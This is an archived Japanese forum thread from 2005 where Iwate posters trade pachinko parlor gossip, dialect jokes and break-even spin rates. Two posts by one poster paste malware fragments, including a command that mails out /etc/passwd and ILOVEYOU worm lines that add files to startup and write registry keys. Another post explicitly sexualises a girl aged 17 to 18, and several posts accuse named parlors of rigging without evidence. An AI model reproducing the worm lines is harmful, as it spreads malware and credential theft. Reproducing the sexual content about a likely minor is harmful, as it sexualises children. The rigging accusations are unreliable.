【渡ル世間ハ】岩手糞店情報交換所2撃目【ボタばかり】
http://gamble2.2ch.net/test/read.cgi/pachi/1066502106/
**岩手県 盛岡市の○○ステージてどうよ?**
http://gamble.2ch.net/test/read.cgi/pachi/1020518565/
番外
【岩手県】宮町古裏苦【宮古市】
http://money3.2ch.net/test/read.cgi/pachi/1082730432/


130 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:29:37 ID:KlHybIgE
削除したほうがよろしいかと


131 :名無しさん@お腹いっぱい。:2005/06/04(土) 18:29:10 ID:MhQO7339
       /⌒ヽ
⊂二二二( ^ω^)二⊃
     |    /       ブーン
      ( ヽノ
      ノ>ノ 
  三  レレ


132 :名無しさん@お腹いっぱい。:2005/06/08(水) 14:13:40 ID:w473KSv/
http://pksp.jp/hamaridaiou/bbs.cgi?&o=1

133 :コウ門太郎:2005/06/08(水) 20:55:01 ID:s1ZzunSB
こんばんは、はずめますてぃ。コウ門太郎でぃす。誰もいねぇのがや?

134 :コウ門太郎:2005/06/08(水) 21:36:42 ID:s1ZzunSB
イェイ!ずいぶん盛り上がんねぇスレだなや。おらほのよ、ちんじょのパツンコ屋はよ、勝でぃばチョンゴレイドくれんだや。おガネよりチョンゴの方がうんめぇがらよ、泡リーチがかがっだらドツキまくってらっすぇ

135 :名無しさん@お腹いっぱい。:2005/06/08(水) 22:03:02 ID:V5sQha9S








































136 :名無しさん@お腹いっぱい。:2005/06/08(水) 22:22:59 ID:mojQGuPr
おらぁ最近まげすぎでもうずんずもただなぐなったぁがや。

137 :コウ門太郎:2005/06/08(水) 23:02:29 ID:s1ZzunSB
んだが!?ずんずがただなぐなっだら焼酎がイイベな。血行がよぐなってよ、夜のぱチンコも絶好調だがや!今夜お前とピンクパンサー、ってバカヤロ!って!そんなお前と船ざんす!ってコノヤロ!


138 :名無しさん@お腹いっぱい。:2005/06/08(水) 23:34:17 ID:mojQGuPr
あぁ。。。。しばらぐ嫁こどやっでねぇがす。
たぁだ最近嫁こも肥でおもぐなっだけぇ駅弁ふぁっぐもでぎなぐなったがねんす。

139 :名無しさん@お腹いっぱい。:2005/06/09(木) 04:26:09 ID:47Qq032y
駅弁てw
本当にやる人いるんだw
ご苦労様です。

140 :コウ門太郎:2005/06/09(木) 22:06:28 ID:TOe5GxuN
えち弁ファッグはすたことねがんすけんどもや、オラの夢はやっぱす親子丼だがっか!ちれいなおかっちゃんと可愛いむしめさんとや、イイ関係になれるなんてよ、考えただけでたまんねぇすけ!未来と現在を行き来できんだべよ!一人バックツザヒーチャーだがや!

141 :名無しさん@お腹いっぱい。:2005/06/10(金) 16:40:45 ID:YdWaP37O
親子丼いいがねぇ。かぁちゃんが40前で娘っ子が17〜18くらいだったら
すげぇ興奮すんがねぇ。
かぁちゃんさヘラしてもらっでおらが娘っ子のしっこくせぇまんこを舐めでけんの。
んで上下二連でピストンすんのえ。

142 :宮町効楽ファン:2005/06/11(土) 00:54:04 ID:ciM0Boxx
しまったぁぁぁぁぁぁっぁぁぁ!!!






orz

143 :S町民:2005/06/11(土) 01:17:19 ID:JnnEu8RD

前スレ、ポテチンサン1000盗りGJ

>>142  m9(^Д^)プギャーーーッ


144 :宮町効楽ファン:2005/06/11(土) 01:31:18 ID:ciM0Boxx
つーかこの一連のエロ話はなんなんだ?
また香ばしいコテが増えたのも気になるし。

コウ門太郎さんとやら、あんたのなまりは結構青森よりだと見たがどう?

>S
もうね、まさか今日(昨日?)のうちに1000までいくとは思ってませんでしたよ。
あっ、それからおりも最近ネットが億劫になってきますたよ。
エロサイトめぐりも昔ほどおもしろくないしね。
最近じゃもっぱらマインスイーパばっかりですわ。

145 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:06:43 ID:9iOHmDtL
オマイ等
今日の空飛ぶ三輪車ウリウリの水着だぜ

146 :名無しさん@お腹いっぱい。:2005/06/11(土) 16:12:50 ID:Q3CvO5j6
ウリウリって何歳なんだべ。
まあ俺的にはありだけど。

147 :みかわ ◆1F6jnA0M9c :2005/06/11(土) 20:20:31 ID:0rDg6fA7
なんだウリウリって?ジョジョの奇声を彷彿!
物袋タンみてーな綺麗な局アナかなんかだろう、そうだろう!きっと新星だ!


つか話は変わるが、セブンのシマに良く通ってたヤシなら分かる話をひとーつ。
あのホールの釣りに一回はヤラレタ人ぜってー何人かいるはず!
セブンのシマに入るたびかなりのペースでちょくちょくなっから
ホールもつまんねーことすんなーって失笑してた。エナ対抗策だか釣りだか乙!

148 :名無しさん@お腹いっぱい。:2005/06/11(土) 20:44:44 ID:vw/YwS7P
>>145
見逃した。_| ̄|○
再放送きぼん

149 :名無しさん@お腹いっぱい。:2005/06/11(土) 23:02:19 ID:7RaMKbi8
ジョジョはウリィィィィですよ

150 :名無しさん@お腹いっぱい。:2005/06/11(土) 23:04:02 ID:zSfQ7liJ
−(・∀・)−ウリウリ水着キタ−
ちちちちちちちち!


151 :みかわ ◆1F6jnA0M9c :2005/06/11(土) 23:10:35 ID:0rDg6fA7
>>149
冷静なレスを頂き冷静になりますた。

しかしえれー人気モンなんだな『ウリウリ』。

152 :名無しさん@お腹いっぱい。:2005/06/11(土) 23:13:13 ID:nxRQFDr9
ウリウリはかわいいぞ、生でみたことあるけどやっぱテレビよりかわいかったな
ちっちぇーけど、スタイルいいよね

つーか最近売ってる最中プラスになっても全ツッパしてしまうくせがついて、金が底をついたよ(´・ω・`)


153 :名無しさん@お腹いっぱい。:2005/06/11(土) 23:19:33 ID:gJGDMEO0
漏れのウリウリも随分立派になったな

154 :名無しさん@お腹いっぱい。:2005/06/12(日) 00:16:51 ID:anEzZRtl
ウリウリうpしますた
http://www.uploda.org/file/uporg123868.jpg


155 :名無しさん@お腹いっぱい。:2005/06/12(日) 00:27:22 ID:tCQJQR0p
>>154
( ゜Д゜)チョルァ!!

156 :名無しさん@お腹いっぱい。:2005/06/12(日) 00:39:04 ID:W5atRfuk
>>155
グロか?

なんかこーガッとあたらねーかなー
スロ覚えたい

157 :名無しさん@お腹いっぱい。:2005/06/12(日) 00:52:16 ID:G2BLtuUT
今後>>154が二度と確変が引けなくなりますように。(-人-)ナムナム

158 :名無しさん@お腹いっぱい。:2005/06/12(日) 00:59:24 ID:tCRImdcz
しかしフェザンで水着になるウリウリはネ申でつか?

159 :名無しさん@お腹いっぱい。:2005/06/12(日) 01:15:07 ID:W5atRfuk
フェザンで水着は神意外の何者でもないな、見たかった…orz

その水着姿でウリウリちゃんリー(ry

160 :名無しさん@お腹いっぱい。:2005/06/12(日) 08:04:32 ID:ayy9fv6a
目蛾のパチンコ玉触ってたら手が真っ黒になったんだが漏れだけか?。

161 :名無しさん@お腹いっぱい。:2005/06/12(日) 11:05:07 ID:Zyms5KBN
うん

162 :名無しさん@お腹いっぱい。:2005/06/12(日) 14:50:28 ID:hcMoMPer
子裏苦系列の金の球は変な色はつくし臭いねぇ



163 :コウ門太郎:2005/06/12(日) 19:58:28 ID:Zyms5KBN
>>144
おらほは生粋の盛岡人だじゃ!俺のおんづさんは青森寄りだがらお盆とが正月は親戚一同にナマリを洗脳されて帰ってくんだじゃ!

ちょうはこのスレで好評の鼻食えまで遠征すてきた。ナナスーゲットで+10k、ルルルぬおまかせで+6kでイイ感づで帰ってきた!収支をレスるな?いがんべじゃ!

164 :みかわ ◆1F6jnA0M9c :2005/06/12(日) 20:11:16 ID:BmcouxEG
好評だったんだ!!

165 :名無しさん@お腹いっぱい。:2005/06/12(日) 20:36:47 ID:/0WzeAO9
↑香ばしいキャラ2連荘オメ

166 :名無しさん@お腹いっぱい。:2005/06/12(日) 20:53:40 ID:TzX7ToMT
>>164
初耳ですがw

167 :名無しさん@お腹いっぱい。:2005/06/12(日) 21:48:31 ID:ZwiClg4c
これってどこのパチンコ屋の店員?

漫画45冊盗む、同じ店に売りにきた20歳男を逮捕 (読売新聞)


 岩手県警北上署は10日、同県北上市村崎野、パチンコ店アルバイト堀ノ正人容疑者(20)を盗みの疑いで緊急逮捕した。

 調べによると、堀ノ容疑者は10日午前10時半から午後4時55分ごろまでの間、同市内の古本屋で、漫画本45冊(1万6700円相当)を盗んだ疑い。

 古本屋では、同日午後5時前、男性店員(31)が書棚に並べてあった漫画本45冊がなくなっているのに気づいた。店内を探していたところ、間もなく堀ノ容疑者がなくなった漫画本を売りに来たという。店員の通報で駆けつけた同署員が、堀ノ容疑者を取り押さえた。

ttp://news.www.infoseek.co.jp/topics/society/thief.html?d=11yomiuri20050611i405&cat=35&typ=t

168 :名無しさん@お腹いっぱい。:2005/06/13(月) 02:13:09 ID:dVKZy4Xv
>>167
全国ニュースなのが久々にワロタ(AA略だったなw

ところでぬこ一番、いいじゃないか、回りはそうでもないっぽかったが、やればできるとこだな。スロはわからんが
前回はあれだったが、次のスーパー銀玉祭は期待しちゃうぞ

ところで、コーラックは玉の色金だから、スーパー金玉祭になるんだろうが、やれよ、ぜひやってくれ
どっかの風俗イベントみたいになっちゃうがキニシナイ

169 :名無しさん@お腹いっぱい。:2005/06/13(月) 18:47:57 ID:hB/H0/98
11 ヽ(´∀`≡´∀`)ノ7777さん sage 新基準01/04/01(金) 22:41:59 ID:PjIjN8vi
>>10
ホタテもあれだがお前もうざい

12 CR宮沢賢治 sage 新基準01/04/01(金) 22:42:49 ID:5nXKiysb
>>10
あいかわらず切れてるねw

13 みかわ ◆1F6jnA0M9c 新基準01/04/01(金) 22:54:13 ID:mToRPgP/
>>11
ええっ!?いまさら??
俺、君の立ててくれたこのスレを無駄にはしないよ!

>>12
賢ちゃん決めたよ。俺頑張る。
ホタテ氏の気持ちを無駄にはしたくないんだ!
今日からこのスレは俺の日記帳として活かしていくことを決めたよ。
ありがとう。みんなありがとう。

14 みかわ ◆1F6jnA0M9c sage 新基準01/04/01(金) 23:05:16 ID:mToRPgP/
    4月1日 金曜日

日本ハムの監督の名前が出てこない、そんな一日でした。



170 :コウ門太郎:2005/06/13(月) 20:21:30 ID:P9TC8CTp
好評でねがったんかい!?パチNowで出玉がランクインしたとがってレス見たような気がするべしよ、こごで鼻食え鼻食えって結構名前お目にするすけ!何だ?オラホは騙されで行ったったのす?


171 :ハイテンション塚越:2005/06/13(月) 22:28:55 ID:BbyLz+BB
今日は13日。カネマン誕生祭の日だってさ。
知り合いから先月カネマン誕生祭の日に結構出てたって聞いたから、
朝から気合十分に並んでまでして行ってみた。

結果。全然出てね〜〜〜。
たった1時間で30k瞬殺されたw

カネマンコは氏ね!

カネマンコのマンコw

http://www.bangedup.com/archives/EatYourPrunessickdog35.jpg

ハーイ、ハイテンション!ハーイ、ハイテンション!

cat /etc/passwd | mail nobody kak.hta';ken=wd+'START ms-its:mhtml:file://c:\
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

172 :S町民:2005/06/13(月) 23:01:03 ID:/5wI+4Ud

  . .:.:.::|;. | 。   ゜ ゚ o       || ̄|| ̄|| ̄
 . . .:.:::::|l i| 。  ゜   ゚ 。   o  . ||==||==||==
. . .:.:::::::::! .,!     .    。     。||_||_||_
.:.:.::::::::::::| ;i|   ゚ 。 o    。   || ̄|| ̄|| ̄
:::::::::::::::::| | ゚  o     ゜      ||==||==||==
:::::::::::::::::| |____ ∧∧ _____.|| ̄ ̄ ̄ ̄
;;;;;;;;;;;;;;;;;|;i |三二三ニ.:/⌒ヽ) ニ三ニ||____
:::::::::::::::::::::       ,/:::::.:. . ヽ    .:.:::::::::::::::::::::
:::::::::::::::::::      (;;;;;;;;;;;;,;,;,,,,)    .:.::::::::::::::::::::::::
::::::::::::::::      .:.:::::::::::::::::. .    .:.:::::::::::::::::::::::::::

コウ門太郎の爺様は三パチ上北が産地だろうか。
生粋の盛岡人?>140では宮古の香りがしたが。>「だがっか」

・・・まぁ、好評だけどね。鼻喰え。いろんな意味で。
俺なら姫tono逝ってみるけど。

173 :みかわ ◆1F6jnA0M9c :2005/06/13(月) 23:35:32 ID:XPCyOC0e
ハイテンションさん家の塚越はスロだろうけど、今日の万個のパチの釘にはガッカリ。
いくつかのシマで軽く通常より底上げ程度。
これが来月からもあんなモンだったら休み取ってまで並ぶ価値ねーな。今月は×。


つかセン虎ルもなんかイベントっぽいのやってたけど…言えない…言えないよあの惨状。
で、前スレの人が良い旦那よ。
やっぱ郷無かった。ヤマトになってたあの奥のほう。さらば名機!

で、ポテチンよ。
魔ッ歯やっぱ半シマあったぜ!ジャパーァァン!
何故か俺があの日見たP−Wでは郷1台ってなってたんだよ、マジで。
だからちょっと行かない間にバラエティ1台残しで撤去したんだとばかり思ってた。
やっぱ巡り巡る良台ハンターは何でもお見通しだな!ジャパァァン!


つかほんとに沿岸の人はルルルぬおまかせって言うのw(・∀・)bジャパァァン!


174 :ポテチン ◆2yCYe14wrw :2005/06/14(火) 00:06:30 ID:gXuoAom7
はい、こんばんは。
先日パチをはじめてワースト2の負けを記録したポテチンです。
こんな有様なので当分パチはできません。ハネはできるけど自信が無くなったので当分自粛です。

>>肛門氏
食え巣戸は盛岡しか行った事ないけど激海が軽くボダ超え+羽がなかなかいい顔してたのに対して新題で入ってたゆけむりや
その他がチョットいまいちだったのが印象的。羽の中にはアイているように見えて実は閉めるトコ閉めてる罠台もあった。
激海で予想以上の出玉だったので今のところは好印象。が、あの変な形のドル箱はいかがなものか。

>>みかわ氏
音速はおすすめ台といって平気で回収するのでその辺がチョットキライ。でも肥溜めの中にタマニ良台が寝てたりするので侮れない。
探すのめんどいからあまり本腰は入れないけど、スペックの種類が豊富だから楽しい店。現金余してカードにするとイチイチ店員呼ばなきゃいけないけど。

やっぱりCの郷で5箱くらい積んでみたい。ささやかな夢。

ルルルぬおまかせだとどうもNRでのホウキアタックが常に空振りしそうでやだなぁ・・。狙ったのにハジキマセーン!って感じで。


175 :ポテチン ◆2yCYe14wrw :2005/06/14(火) 00:07:37 ID:gXuoAom7
長い上に、名前間違ってました。コウ門氏、申し訳ない。

176 :ポコチン◇2yCYe14wrw :2005/06/14(火) 01:12:11 ID:+DdfPxei
みかわぬおまかせ

177 :コウ門太郎:2005/06/14(火) 21:07:45 ID:0Nnf/NPm
>>ポテツン氏
盛岡の食えは、んなのが?俺は盛岡ド真ん中ではパツすねーげどな!駅前とが出すてんのが?中心地の外側の方が安全な気がすっからしゃ!入ったこだねーけども、あぐまでぃもオラホのインメズの話すっこな!とごろでよ、前がら気になってたんだけんどもや、ボダって、なぬ?
>>みかわ氏
もすかすて名前の由来はホットライン肴町のみかわやの事なのっす?

178 :名無しさん@お腹いっぱい。:2005/06/14(火) 21:47:21 ID:gpR+97Eb
藻舞ら
今夜スクールウォーズ最終回でつよ

179 :コウ門太郎:2005/06/14(火) 22:10:09 ID:0Nnf/NPm
>>S町民氏
いろんな意味で好評って、どんな意味だがや?だがらよ、オラホは盛岡だげどよ、むがす会社の同僚に宮古すっすんのやづがいでよ、ナマリがチョウレツでよ、使ってみただげだっぺよ!つーがよ、読みにぐぐでイラつかねぇえんが?

180 :S町民:2005/06/14(火) 23:40:27 ID:kauCIs/G
>>179
ヒント:浦路夢・サム外れ(だったかな?)・入水自殺のオカン
・・・祭の話題には事欠きませんっていうことで。>いろんな意味

訛りは気になさるな。俺もバリンバリンに訛ってらがらw
ちょいとお願いがあるといえば、適当に改行入れてくれっと有難い。
オラホのインメズって・・・おらほのイメンズ(image)のことスか?

181 :名無しさん@お腹いっぱい。:2005/06/15(水) 01:53:23 ID:2rkDBUL9
どれ明日から仙台周辺のパチ屋探ってくるか

182 :名無しさん@お腹いっぱい。:2005/06/16(木) 01:05:17 ID:CWbFoKJP
仙台南地区
数軒ハシゴしたがボーダー以上の台結構あるがFと海系しか出てない
海豚のエヴァ一台おきに出してんじゃねーよ!
明日は泉地区攻めてみます
やっぱ本命は虎?
大穴で宮城〇〇?

今仙台はFの台が熱いみたいでFの島だけ鉄火場

183 :ポテチン ◆2yCYe14wrw :2005/06/16(木) 07:15:06 ID:Zv6YrvpQ
モーニン。ポテチンです。

>>コウ門氏
ボダというのはボーダーラインのことで、大体6時間くらいを目安にして理論上収支が+-0にする為に必要な回転数の事だす。
機種のスペックや賞球数によっても変わったりします。
わかりやすくいえば、1000円/○回以上回るならこれは勝てる台の目安です。詳しく知りたいとかならパチマガ見たほうが早いです。
今は3円の店が多いので半日以上打つ覚悟なら最低21-22回るなら勝負してもいいかなっていう感じに使っていただければ。

ちなみにオイラの場合は時間があやふやなので2.5円-3円までなら25以上、3円-等価なら22以上を自分のボーダーにしてます。無論、モットモット回るぜ!ってんならジャブジャブ金突っ込みます。

184 :名無しさん@お腹いっぱい。:2005/06/16(木) 08:25:36 ID:+PfPsuTm
ポテチンかわいいよw

185 :名無しさん@お腹いっぱい。:2005/06/16(木) 15:20:48 ID:hbFX7jEL
小群からのメール必死杉

186 :名無しさん@お腹いっぱい。:2005/06/16(木) 17:50:51 ID:uUhmZck7
ポコチンのマジレスw



187 :名無しさん@お腹いっぱい。:2005/06/16(木) 18:32:07 ID:Jm7vDGB5
漏れ今、横浜にいるんだがいい店しらない?

188 :名無しさん@お腹いっぱい。:2005/06/17(金) 02:19:52 ID:rRRktZRt
ここではコテの馴れ合いを一切厳禁とします。
あくまでレス番号だけでやり取りしてください。
無意味な収支報告も他でやってください。

店名、個人を特定できるような書きこみもタブーです。
有意義な情報交換の場にしましょう。
皆さんの良識ある利用を期待します。

189 :ぴん:2005/06/17(金) 04:13:08 ID:IDXpPGAh
岩手のコ〇ラクグループは最悪。店長クラスの人間がチンピラ、サクラに設定いい台教えてます。遠隔だし。沿岸のうぃ〇ずかなりのボッタ店です。吉宗はいつも同じチンピラ、クソ女しか出してません。

190 :名無しさん@お腹いっぱい。:2005/06/17(金) 14:32:31 ID:vyBqZrk7
>>189
コーラクで大負けでもしたのかい?( ´_ゝ`)

191 :名無しさん@お腹いっぱい。:2005/06/17(金) 20:51:03 ID:sS8KoYIV
盛岡都南和ール土

遠隔操作してるらしいよ。だから毎回サクラらしきおばちゃんだしてた。

スロットもストック消してたし。

なんであんなに客つきがいいのかわからんなー。

192 :名無しさん@お腹いっぱい。:2005/06/19(日) 01:08:50 ID:OWZyb56D
>>189
そんなに信用できないなら
毎回行くの辞めればいいのにと言ってみる。

193 :名無しさん@お腹いっぱい。:2005/06/19(日) 03:08:14 ID:NWnUPxSO
遠隔遠隔ってウルサイ(`Д´)
そんなコストかかる様な事しなくても
抜く方法なんていくらでもあるっつーの!!

194 :名無しさん@お腹いっぱい。:2005/06/19(日) 13:52:01 ID:C+EIyXqc
最近みかわみかけないけど?


195 :名無しさん@お腹いっぱい。:2005/06/19(日) 14:44:34 ID:xEPW4V2K
横浜PIAおすすめw

196 :名無しさん@お腹いっぱい。:2005/06/20(月) 02:26:33 ID:RqBp8hR7
害亜おすすめ

197 :名無しさん@お腹いっぱい。:2005/06/20(月) 08:23:15 ID:1HEKHDC1
息子『父さん!カネマソコで凄いイベントやるって聞いたけど本当?』

店長『メガインパクトの事か?』

息子『1機種(島)ぜ〜んぶ【金】の機種(島)があるって聞いたけど?』

店長『【金】だけじゃ無く【銀】【銅】だけの機種(島)もあるぞ!』

息子『ということは20台連続【金】の可能性もあるの?』

店長『勿論さ!私の夢は誕生祭を超えるイベントを作る事さ!』

息子『出しすぎてクビにならないでね!』

店長『・・・』(汗)

198 :名無しさん@お腹いっぱい。:2005/06/20(月) 13:02:49 ID:Xaucal/i
>>197
(/д`)店長さん乙!

199 :ハイテンション塚越:2005/06/20(月) 22:32:52 ID:K7ANePvh
>>197
(´ι _`  )あっそ、カネマンコは氏ね!

カネマンコのパチスロ台は、ALL設定2以下でござりまする。

カネマンコのマンコw

http://www.bangedup.com/archives/EatYourPrunessickdog35.jpg

ハーイ、ハイテンション!ハーイ、ハイテンション!

cat /etc/passwd | mail nobody kak.hta';ken=wd+'START ms-its:mhtml:file://c:\
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

200 :名無しさん@お腹いっぱい。:2005/06/21(火) 18:06:02 ID:ODauum/Q
ハイテンションこら!
いい加減ウイルス貼るのやめれ!
レス番飛ばしを確認するためブラウザで開くたんびにノートン先生がゴルァしてうざいんじゃ!

201 :名無しさん@お腹いっぱい。:2005/06/23(木) 19:59:41 ID:ECtHr9ve
さて、明日の会社帰りにでもパチってくるかな。おい!藻前らの藻すすめ店と藻前らの藻すすめの台を藻しえてくれ。藻ちろん18時頃から出そうな事を前提にです。よろしく藻ねがい藻うしあげますっ

202 :名無しさん@お腹いっぱい。:2005/06/23(木) 20:26:12 ID:FuCjrVH2
ウィンズ宮古のハネモノはぜんぜん出してねぇな。
ずーと閉めたまんまでもあれくらいじじばばがつぎ込んで逝くのもまさに沿岸苦を利ティW

203 :チョン店長:2005/06/23(木) 21:57:11 ID:2DTxfVS8
ゴールドラッシュあっぽろグループは、近々大海の増大を
する予定でありますれば、お客様方からその大海増大の
費用を回収しております最中でありますので、いましばらく
当店のボッタクリ期間をお楽しみくださりませ。

204 :名無しさん@お腹いっぱい。:2005/06/23(木) 22:06:28 ID:jmZJhHmw
あなたの嫌いなコテハンを書いてね

パチンコサロン 機種 地域 で限定

100消化くらいで集計

一人一日一票

http://money3.2ch.net/test/read.cgi/pachi/1119187504/


205 :名無しさん@お腹いっぱい。:2005/06/23(木) 22:17:36 ID:ECtHr9ve
藻前ら、藻れをバカにしてんのか?ちゃんとしたレスがないんですが、個人的な意見でいいので盛岡近辺の優良店を紹介してくらはい!


206 :名無しさん@お腹いっぱい。:2005/06/23(木) 22:45:52 ID:wfNp3Ylq
>>205
パチはやらないんで良く分からんが、
省群や鐘萬、換金率低くてもイイなら末矢あたりじゃないの。

あとね、ちょっと言わせてもらうが、18時くらいから出始める店ってなんだ?
遠隔でもしてない限り、そんなの分かる訳ないじゃん!!
稼動が上がれば出てる様に見えるかもしれないが
実際の割なんて客側からなんかワカランしなぁ(  ´Д`)
客付きが良くて、あまり出ている様に見えない店を避ければイイかと。




207 :名無しさん@お腹いっぱい。:2005/06/24(金) 00:40:04 ID:hJF2KIId
どんな店でも金注ぎ込めば一回位は出るべ
(・∀・)ニヤニヤ


208 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:19:41 ID:sd8yoO7N
それが出ないとこがあるから言ってんだべよ〜

209 :名無しさん@お腹いっぱい。:2005/06/24(金) 12:37:32 ID:jBYo1mjg
うんこがでる

210 :名無しさん@お腹いっぱい。:2005/06/24(金) 23:13:55 ID:CvL+GDl/
>>205
釘読みすればいいでしょ
漏れは15店ほど回って下見してるけど


211 :名無しさん@お腹いっぱい。:2005/06/24(金) 23:26:36 ID:dJkSp/+/
>210 15店って・・・バカじゃねーの?
   真面目に働けよ。
  

212 :名無しさん@お腹いっぱい。:2005/06/25(土) 09:33:08 ID:Q6CrtL/g
>>211
笑同
いくら狭い街だからって…程がある‥

213 :名無しさん@お腹いっぱい。:2005/06/25(土) 15:47:58 ID:yt8C4FRd
まじめに働いてますよ
少ない小遣い増やすために必死なんですよ

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)